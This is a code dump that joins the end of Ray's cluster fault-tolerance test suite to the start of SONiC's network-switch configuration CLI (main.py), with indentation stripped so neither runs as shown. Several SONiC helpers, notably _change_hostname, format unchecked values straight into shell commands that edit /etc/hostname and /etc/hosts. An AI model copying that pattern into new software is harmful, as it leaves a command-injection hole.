cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_system_config": {
"object_store_full_max_retries": 0
}
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"object_store_full_max_retries": 0})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = {
"free_objects_batch_size": 1,
}
ray.init(
num_cpus=2,
object_store_memory=10**8,
_lru_evict=True,
_system_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
main.py
|
#!/usr/sbin/env python
import click
import ipaddress
import json
import netaddr
import netifaces
import os
import re
import subprocess
import sys
import threading
import time
from socket import AF_INET, AF_INET6
from minigraph import parse_device_desc_xml
from portconfig import get_child_ports
from sonic_py_common import device_info, multi_asic
from sonic_py_common.interface import get_interface_table_name, get_port_table_name
from swsssdk import ConfigDBConnector, SonicDBConfig
from swsscommon.swsscommon import SonicV2Connector
from utilities_common.db import Db
from utilities_common.intf_filter import parse_interface_in_filter
import utilities_common.cli as clicommon
from .utils import log
from . import aaa
from . import chassis_modules
from . import console
from . import feature
from . import kdump
from . import kube
from . import mlnx
from . import muxcable
from . import nat
from . import vlan
from . import vxlan
from .config_mgmt import ConfigMgmtDPB
# mock masic APIs for unit test
try:
if os.environ["UTILITIES_UNIT_TESTING"] == "1" or os.environ["UTILITIES_UNIT_TESTING"] == "2":
modules_path = os.path.join(os.path.dirname(__file__), "..")
tests_path = os.path.join(modules_path, "tests")
sys.path.insert(0, modules_path)
sys.path.insert(0, tests_path)
import mock_tables.dbconnector
if os.environ["UTILITIES_UNIT_TESTING_TOPOLOGY"] == "multi_asic":
import mock_tables.mock_multi_asic
mock_tables.dbconnector.load_namespace_config()
except KeyError:
pass
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help', '-?'])
SONIC_GENERATED_SERVICE_PATH = '/etc/sonic/generated_services.conf'
SONIC_CFGGEN_PATH = '/usr/local/bin/sonic-cfggen'
VLAN_SUB_INTERFACE_SEPARATOR = '.'
ASIC_CONF_FILENAME = 'asic.conf'
DEFAULT_CONFIG_DB_FILE = '/etc/sonic/config_db.json'
NAMESPACE_PREFIX = 'asic'
INTF_KEY = "interfaces"
INIT_CFG_FILE = '/etc/sonic/init_cfg.json'
SYSTEMCTL_ACTION_STOP="stop"
SYSTEMCTL_ACTION_RESTART="restart"
SYSTEMCTL_ACTION_RESET_FAILED="reset-failed"
DEFAULT_NAMESPACE = ''
CFG_LOOPBACK_PREFIX = "Loopback"
CFG_LOOPBACK_PREFIX_LEN = len(CFG_LOOPBACK_PREFIX)
CFG_LOOPBACK_NAME_TOTAL_LEN_MAX = 11
CFG_LOOPBACK_ID_MAX_VAL = 999
CFG_LOOPBACK_NO="<0-999>"
CFG_PORTCHANNEL_PREFIX = "PortChannel"
CFG_PORTCHANNEL_PREFIX_LEN = 11
CFG_PORTCHANNEL_NAME_TOTAL_LEN_MAX = 15
CFG_PORTCHANNEL_MAX_VAL = 9999
CFG_PORTCHANNEL_NO="<0-9999>"
PORT_MTU = "mtu"
PORT_SPEED = "speed"
asic_type = None
#
# Breakout Mode Helper functions
#
# Read given JSON file
def readJsonFile(fileName):
try:
with open(fileName) as f:
result = json.load(f)
except Exception as e:
raise Exception(str(e))
return result
def _get_breakout_options(ctx, args, incomplete):
""" Provides dynamic mode option as per user argument i.e. interface name """
all_mode_options = []
interface_name = args[-1]
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
return []
else:
breakout_file_input = readJsonFile(breakout_cfg_file)
if interface_name in breakout_file_input[INTF_KEY]:
breakout_mode_list = [v["breakout_modes"] for i, v in breakout_file_input[INTF_KEY].items() if i == interface_name][0]
breakout_mode_options = []
for i in breakout_mode_list.split(','):
breakout_mode_options.append(i)
all_mode_options = [str(c) for c in breakout_mode_options if incomplete in c]
return all_mode_options
def shutdown_interfaces(ctx, del_intf_dict):
""" shut down all the interfaces before deletion """
for intf in del_intf_dict:
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, intf)
if interface_name is None:
click.echo("[ERROR] interface name is None!")
return False
if interface_name_is_valid(config_db, intf) is False:
click.echo("[ERROR] Interface name is invalid. Please enter a valid interface name!!")
return False
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
return False
if intf in port_dict:
config_db.mod_entry("PORT", intf, {"admin_status": "down"})
else:
click.secho("[ERROR] Could not get the correct interface name, exiting", fg='red')
return False
return True
def _validate_interface_mode(ctx, breakout_cfg_file, interface_name, target_brkout_mode, cur_brkout_mode):
""" Validate Parent interface and user selected mode before starting deletion or addition process """
breakout_file_input = readJsonFile(breakout_cfg_file)["interfaces"]
if interface_name not in breakout_file_input:
click.secho("[ERROR] {} is not a Parent port. So, Breakout Mode is not available on this port".format(interface_name), fg='red')
return False
# Check whether target breakout mode is available for the user-selected interface or not
if target_brkout_mode not in breakout_file_input[interface_name]["breakout_modes"]:
click.secho('[ERROR] Target mode {} is not available for the port {}'. format(target_brkout_mode, interface_name), fg='red')
return False
# Get config db context
config_db = ctx.obj['config_db']
port_dict = config_db.get_table('PORT')
# Check whether there is any port in config db.
if not port_dict:
click.echo("port_dict is None!")
return False
# Check whether the user-selected interface is part of 'port' table in config db.
if interface_name not in port_dict:
click.secho("[ERROR] {} is not in port_dict".format(interface_name))
return False
click.echo("\nRunning Breakout Mode : {} \nTarget Breakout Mode : {}".format(cur_brkout_mode, target_brkout_mode))
if (cur_brkout_mode == target_brkout_mode):
click.secho("[WARNING] No action will be taken as current and desired Breakout Mode are same.", fg='magenta')
sys.exit(0)
return True
def load_ConfigMgmt(verbose):
""" Load config for the commands which are capable of change in config DB. """
try:
cm = ConfigMgmtDPB(debug=verbose)
return cm
except Exception as e:
raise Exception("Failed to load the config. Error: {}".format(str(e)))
def breakout_warnUser_extraTables(cm, final_delPorts, confirm=True):
"""
Function to warn user about extra tables while Dynamic Port Breakout(DPB).
confirm: re-confirm from user to proceed.
Config Tables Without Yang model considered extra tables.
cm = instance of config MGMT class.
"""
try:
# check if any extra tables exist
eTables = cm.tablesWithOutYang()
if len(eTables):
# find relavent tables in extra tables, i.e. one which can have deleted
# ports
tables = cm.configWithKeys(configIn=eTables, keys=final_delPorts)
click.secho("Below Config can not be verified, It may cause harm "\
"to the system\n {}".format(json.dumps(tables, indent=2)))
click.confirm('Do you wish to Continue?', abort=True)
except Exception as e:
raise Exception("Failed in breakout_warnUser_extraTables. Error: {}".format(str(e)))
return
def breakout_Ports(cm, delPorts=list(), portJson=dict(), force=False, \
loadDefConfig=False, verbose=False):
deps, ret = cm.breakOutPort(delPorts=delPorts, portJson=portJson, \
force=force, loadDefConfig=loadDefConfig)
# check if DPB failed
if ret == False:
if not force and deps:
click.echo("Dependecies Exist. No further action will be taken")
click.echo("*** Printing dependecies ***")
for dep in deps:
click.echo(dep)
sys.exit(0)
else:
click.echo("[ERROR] Port breakout Failed!!! Opting Out")
raise click.Abort()
return
#
# Helper functions
#
# Execute action per NPU instance for multi instance services.
def execute_systemctl_per_asic_instance(inst, event, service, action):
try:
click.echo("Executing {} of service {}@{}...".format(action, service, inst))
clicommon.run_command("systemctl {} {}@{}.service".format(action, service, inst))
except SystemExit as e:
log.log_error("Failed to execute {} of service {}@{} with error {}".format(action, service, inst, e))
# Set the event object if there is a failure and exception was raised.
event.set()
# Execute action on list of systemd services
def execute_systemctl(list_of_services, action):
num_asic = multi_asic.get_num_asics()
generated_services_list, generated_multi_instance_services = _get_sonic_generated_services(num_asic)
if ((generated_services_list == []) and
(generated_multi_instance_services == [])):
log.log_error("Failed to get generated services")
return
for service in list_of_services:
if (service + '.service' in generated_services_list):
try:
click.echo("Executing {} of service {}...".format(action, service))
clicommon.run_command("systemctl {} {}".format(action, service))
except SystemExit as e:
log.log_error("Failed to execute {} of service {} with error {}".format(action, service, e))
raise
if (service + '.service' in generated_multi_instance_services):
# With Multi NPU, Start a thread per instance to do the "action" on multi instance services.
if multi_asic.is_multi_asic():
threads = []
# Use this event object to co-ordinate if any threads raised exception
e = threading.Event()
kwargs = {'service': service, 'action': action}
for inst in range(num_asic):
t = threading.Thread(target=execute_systemctl_per_asic_instance, args=(inst, e), kwargs=kwargs)
threads.append(t)
t.start()
# Wait for all the threads to finish.
for inst in range(num_asic):
threads[inst].join()
# Check if any of the threads have raised exception, if so exit the process.
if e.is_set():
sys.exit(1)
def _get_device_type():
"""
Get device type
TODO: move to sonic-py-common
"""
command = "{} -m -v DEVICE_METADATA.localhost.type".format(SONIC_CFGGEN_PATH)
proc = subprocess.Popen(command, shell=True, text=True, stdout=subprocess.PIPE)
device_type, err = proc.communicate()
if err:
click.echo("Could not get the device type from minigraph, setting device type to Unknown")
device_type = 'Unknown'
else:
device_type = device_type.strip()
return device_type
def interface_alias_to_name(config_db, interface_alias):
"""Return default interface name if alias name is given as argument
"""
vlan_id = ""
sub_intf_sep_idx = -1
if interface_alias is not None:
sub_intf_sep_idx = interface_alias.find(VLAN_SUB_INTERFACE_SEPARATOR)
if sub_intf_sep_idx != -1:
vlan_id = interface_alias[sub_intf_sep_idx + 1:]
# interface_alias holds the parent port name so the subsequent logic still applies
interface_alias = interface_alias[:sub_intf_sep_idx]
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_alias)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_alias is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
if interface_alias == port_dict[port_name]['alias']:
return port_name if sub_intf_sep_idx == -1 else port_name + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
# Interface alias not in port_dict, just return interface_alias, e.g.,
# portchannel is passed in as argument, which does not have an alias
return interface_alias if sub_intf_sep_idx == -1 else interface_alias + VLAN_SUB_INTERFACE_SEPARATOR + vlan_id
def interface_name_is_valid(config_db, interface_name):
"""Check if the interface name is valid
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return False
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
port_channel_dict = config_db.get_table('PORTCHANNEL')
sub_port_intf_dict = config_db.get_table('VLAN_SUB_INTERFACE')
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
if interface_name == port_name:
return True
if port_channel_dict:
for port_channel_name in port_channel_dict:
if interface_name == port_channel_name:
return True
if sub_port_intf_dict:
for sub_port_intf_name in sub_port_intf_dict:
if interface_name == sub_port_intf_name:
return True
return False
def interface_name_to_alias(config_db, interface_name):
"""Return alias interface name if default name is given as argument
"""
# If the input parameter config_db is None, derive it from interface.
# In single ASIC platform, get_port_namespace() returns DEFAULT_NAMESPACE.
if config_db is None:
namespace = get_port_namespace(interface_name)
if namespace is None:
return None
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
port_dict = config_db.get_table('PORT')
if interface_name is not None:
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
if interface_name == port_name:
return port_dict[port_name]['alias']
return None
def interface_ipaddr_dependent_on_interface(config_db, interface_name):
"""Get table keys including ipaddress
"""
data = []
table_name = get_interface_table_name(interface_name)
if table_name == "":
return data
keys = config_db.get_keys(table_name)
for key in keys:
if interface_name in key and len(key) == 2:
data.append(key)
return data
def is_interface_bind_to_vrf(config_db, interface_name):
"""Get interface if bind to vrf or not
"""
table_name = get_interface_table_name(interface_name)
if table_name == "":
return False
entry = config_db.get_entry(table_name, interface_name)
if entry and entry.get("vrf_name"):
return True
return False
def is_portchannel_name_valid(portchannel_name):
"""Port channel name validation
"""
# Return True if Portchannel name is PortChannelXXXX (XXXX can be 0-9999)
if portchannel_name[:CFG_PORTCHANNEL_PREFIX_LEN] != CFG_PORTCHANNEL_PREFIX :
return False
if (portchannel_name[CFG_PORTCHANNEL_PREFIX_LEN:].isdigit() is False or
int(portchannel_name[CFG_PORTCHANNEL_PREFIX_LEN:]) > CFG_PORTCHANNEL_MAX_VAL) :
return False
if len(portchannel_name) > CFG_PORTCHANNEL_NAME_TOTAL_LEN_MAX:
return False
return True
def is_portchannel_present_in_db(db, portchannel_name):
"""Check if Portchannel is present in Config DB
"""
# Return True if Portchannel name exists in the CONFIG_DB
portchannel_list = db.get_table(CFG_PORTCHANNEL_PREFIX)
if portchannel_list is None:
return False
if portchannel_name in portchannel_list:
return True
return False
def is_port_member_of_this_portchannel(db, port_name, portchannel_name):
"""Check if a port is member of given portchannel
"""
portchannel_list = db.get_table(CFG_PORTCHANNEL_PREFIX)
if portchannel_list is None:
return False
for k,v in db.get_table('PORTCHANNEL_MEMBER'):
if (k == portchannel_name) and (v == port_name):
return True
return False
# Return the namespace where an interface belongs
# The port name input could be in default mode or in alias mode.
def get_port_namespace(port):
# If it is a non multi-asic platform, or if the interface is management interface
# return DEFAULT_NAMESPACE
if not multi_asic.is_multi_asic() or port == 'eth0':
return DEFAULT_NAMESPACE
# Get the table to check for interface presence
table_name = get_port_table_name(port)
if table_name == "":
return None
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
# If the interface naming mode is alias, search the tables for alias_name.
if clicommon.get_interface_naming_mode() == "alias":
port_dict = config_db.get_table(table_name)
if port_dict:
for port_name in port_dict:
if port == port_dict[port_name]['alias']:
return namespace
else:
entry = config_db.get_entry(table_name, port)
if entry:
return namespace
return None
def del_interface_bind_to_vrf(config_db, vrf_name):
"""del interface bind to vrf
"""
tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
for table_name in tables:
interface_dict = config_db.get_table(table_name)
if interface_dict:
for interface_name in interface_dict:
if 'vrf_name' in interface_dict[interface_name] and vrf_name == interface_dict[interface_name]['vrf_name']:
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
def set_interface_naming_mode(mode):
"""Modify SONIC_CLI_IFACE_MODE env variable in user .bashrc
"""
user = os.getenv('SUDO_USER')
bashrc_ifacemode_line = "export SONIC_CLI_IFACE_MODE={}".format(mode)
# In case of multi-asic, we can check for the alias mode support in any of
# the namespaces as this setting of alias mode should be identical everywhere.
# Here by default we set the namespaces to be a list just having '' which
# represents the linux host. In case of multi-asic, we take the first namespace
# created for the front facing ASIC.
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
namespaces = multi_asic.get_all_namespaces()['front_ns']
# Ensure all interfaces have an 'alias' key in PORT dict
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespaces[0])
config_db.connect()
port_dict = config_db.get_table('PORT')
if not port_dict:
click.echo("port_dict is None!")
raise click.Abort()
for port_name in port_dict:
try:
if port_dict[port_name]['alias']:
pass
except KeyError:
click.echo("Platform does not support alias mapping")
raise click.Abort()
if not user:
user = os.getenv('USER')
if user != "root":
bashrc = "/home/{}/.bashrc".format(user)
else:
click.get_current_context().fail("Cannot set interface naming mode for root user!")
f = open(bashrc, 'r')
filedata = f.read()
f.close()
if "SONIC_CLI_IFACE_MODE" not in filedata:
newdata = filedata + bashrc_ifacemode_line
newdata += "\n"
else:
newdata = re.sub(r"export SONIC_CLI_IFACE_MODE=\w+",
bashrc_ifacemode_line, filedata)
f = open(bashrc, 'w')
f.write(newdata)
f.close()
click.echo("Please logout and log back in for changes take effect.")
def _is_neighbor_ipaddress(config_db, ipaddress):
"""Returns True if a neighbor has the IP address <ipaddress>, False if not
"""
entry = config_db.get_entry('BGP_NEIGHBOR', ipaddress)
return True if entry else False
def _get_all_neighbor_ipaddresses(config_db):
"""Returns list of strings containing IP addresses of all BGP neighbors
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
for addr, session in bgp_sessions.items():
addrs.append(addr)
return addrs
def _get_neighbor_ipaddress_list_by_hostname(config_db, hostname):
"""Returns list of strings, each containing an IP address of neighbor with
hostname <hostname>. Returns empty list if <hostname> not a neighbor
"""
addrs = []
bgp_sessions = config_db.get_table('BGP_NEIGHBOR')
for addr, session in bgp_sessions.items():
if 'name' in session and session['name'] == hostname:
addrs.append(addr)
return addrs
def _change_bgp_session_status_by_addr(config_db, ipaddress, status, verbose):
"""Start up or shut down BGP session by IP address
"""
verb = 'Starting' if status == 'up' else 'Shutting'
click.echo("{} {} BGP session with neighbor {}...".format(verb, status, ipaddress))
config_db.mod_entry('bgp_neighbor', ipaddress, {'admin_status': status})
def _change_bgp_session_status(config_db, ipaddr_or_hostname, status, verbose):
"""Start up or shut down BGP session by IP address or hostname
"""
ip_addrs = []
# If we were passed an IP address, convert it to lowercase because IPv6 addresses were
# stored in ConfigDB with all lowercase alphabet characters during minigraph parsing
if _is_neighbor_ipaddress(config_db, ipaddr_or_hostname.lower()):
ip_addrs.append(ipaddr_or_hostname.lower())
else:
# If <ipaddr_or_hostname> is not the IP address of a neighbor, check to see if it's a hostname
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, ipaddr_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
_change_bgp_session_status_by_addr(config_db, ip_addr, status, verbose)
return True
def _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname):
"""validates whether the given ip or host name is a BGP neighbor
"""
ip_addrs = []
if _is_neighbor_ipaddress(config_db, neighbor_ip_or_hostname.lower()):
ip_addrs.append(neighbor_ip_or_hostname.lower())
else:
ip_addrs = _get_neighbor_ipaddress_list_by_hostname(config_db, neighbor_ip_or_hostname.upper())
return ip_addrs
def _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
"""Removes BGP configuration of the given neighbor
"""
ip_addrs = _validate_bgp_neighbor(config_db, neighbor_ip_or_hostname)
if not ip_addrs:
return False
for ip_addr in ip_addrs:
config_db.mod_entry('bgp_neighbor', ip_addr, None)
click.echo("Removed configuration of BGP neighbor {}".format(ip_addr))
return True
def _change_hostname(hostname):
current_hostname = os.uname()[1]
if current_hostname != hostname:
clicommon.run_command('echo {} > /etc/hostname'.format(hostname), display_cmd=True)
clicommon.run_command('hostname -F /etc/hostname', display_cmd=True)
clicommon.run_command('sed -i "/\s{}$/d" /etc/hosts'.format(current_hostname), display_cmd=True)
clicommon.run_command('echo "127.0.0.1 {}" >> /etc/hosts'.format(hostname), display_cmd=True)
def _clear_qos():
QOS_TABLE_NAMES = [
'TC_TO_PRIORITY_GROUP_MAP',
'MAP_PFC_PRIORITY_TO_QUEUE',
'TC_TO_QUEUE_MAP',
'DSCP_TO_TC_MAP',
'SCHEDULER',
'PFC_PRIORITY_TO_PRIORITY_GROUP_MAP',
'PORT_QOS_MAP',
'WRED_PROFILE',
'QUEUE',
'CABLE_LENGTH',
'BUFFER_POOL',
'BUFFER_PROFILE',
'BUFFER_PG',
'BUFFER_QUEUE']
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(
use_unix_socket_path=True, namespace=ns
)
config_db.connect()
for qos_table in QOS_TABLE_NAMES:
config_db.delete_table(qos_table)
def _get_sonic_generated_services(num_asic):
if not os.path.isfile(SONIC_GENERATED_SERVICE_PATH):
return None
generated_services_list = []
generated_multi_instance_services = []
with open(SONIC_GENERATED_SERVICE_PATH) as generated_service_file:
for line in generated_service_file:
if '@' in line:
line = line.replace('@', '')
if num_asic > 1:
generated_multi_instance_services.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
else:
generated_services_list.append(line.rstrip('\n'))
return generated_services_list, generated_multi_instance_services
# Callback for confirmation prompt. Aborts if user enters "n"
def _abort_if_false(ctx, param, value):
if not value:
ctx.abort()
def _get_disabled_services_list(config_db):
disabled_services_list = []
feature_table = config_db.get_table('FEATURE')
if feature_table is not None:
for feature_name in feature_table:
if not feature_name:
log.log_warning("Feature is None")
continue
state = feature_table[feature_name]['state']
if not state:
log.log_warning("Enable state of feature '{}' is None".format(feature_name))
continue
if state == "disabled":
disabled_services_list.append(feature_name)
else:
log.log_warning("Unable to retreive FEATURE table")
return disabled_services_list
def _stop_services(config_db):
# This list is order-dependent. Please add services in the order they should be stopped
# on Mellanox platform pmon is stopped by syncd
services_to_stop = [
'telemetry',
'restapi',
'swss',
'lldp',
'pmon',
'bgp',
'hostcfgd',
'nat'
]
if asic_type == 'mellanox' and 'pmon' in services_to_stop:
services_to_stop.remove('pmon')
disabled_services = _get_disabled_services_list(config_db)
for service in disabled_services:
if service in services_to_stop:
services_to_stop.remove(service)
execute_systemctl(services_to_stop, SYSTEMCTL_ACTION_STOP)
def _reset_failed_services(config_db):
# This list is order-independent. Please keep list in alphabetical order
services_to_reset = [
'bgp',
'dhcp_relay',
'hostcfgd',
'hostname-config',
'interfaces-config',
'lldp',
'nat',
'ntp-config',
